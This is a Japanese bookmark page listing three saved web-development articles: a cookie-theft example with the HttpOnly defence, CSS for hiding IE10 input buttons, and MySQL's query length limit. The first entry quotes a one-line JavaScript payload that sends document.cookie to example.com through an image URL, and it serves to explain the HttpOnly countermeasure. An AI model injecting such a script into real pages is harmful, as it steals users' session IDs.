yamadarのブックマーク - はてなブックマーク

Cookieを盗む例とhttponly属性 at softelメモ
以下は、とても単純なJavascriptによる例。 document.write('<img src="http://example.com/?x=' +escape(document.cookie) + '">'); example.com に対してGET渡しでdocument.cookieが送信される。取得されたcookieにセッションIDが含まれるとセッションIDが他人に知られるところとなる。リンクを踏ませるなどの方法でHTML中に上のようなスクリプトを仕込むことができると、攻撃が成立する。対策例 document.cookieで取得できてしまうから危険なのでは？ → 発行するcookieにhttponly属性を付与して、document.cookieで取得できなくしよう WordPressでも以下のような書き方をしていた。PHP5.2.0で追加された第7引数でhttponly
yamadar 2014/08/19
HttpOnly属性について

HTTP

セキュリティ
リンク
【HTML】IE10のinput要素のxボタンを消す at softelメモ
問題 IE10になって、フォームのテキスト入力欄に「×」ボタンや、パスワード入力欄に目のマークが出るようになったんだけど、これ消せますか。答え CSSで消せる（-msプレフィックス付き）。「×」マーク（クリアボタン）は、::-ms-clear 擬似要素で。 input::-ms-clear { visibility:hidden } 目のマーク（パスワード表示ボタン）は、::-ms-reveal 擬似要素で。 input::-ms-reveal { visibility:hidden }
yamadar 2014/03/27
“目のマーク（パスワード表示ボタン）は、::-ms-reveal 擬似要素で。 input::-ms-reveal { visibility:hidden }”

+IE

*CSS

*html
リンク
【MySQL】SQLの最大長は？ at softelメモ
普段意識することはないですが、MySQLのクエリの長さには制限値があります。 ● どこで分かるの？ → /etc/my.cnf に書いてある。 max_allowed_packet という設定項目。こんな感じで書いてあります。 max_allowed_packet=32M 設定ファイルを変えて MySQL再起動で、制限値を変えることが可能です。 ●サーバーにログインできないから見えないんだけど？ →MySQLの各種設定値、変数は SHOW VARIAVLES で見ることができる。 mysql> show variables like 'max_allowed_packet'; +--------------------+----------+ | Variable_name | Value | +--------------------+----------+ | max_allowed
yamadar 2010/09/17
SQL文の最大長は、show variables like 'max_allowed_packet'; で見る。

*MySQL
リンク
1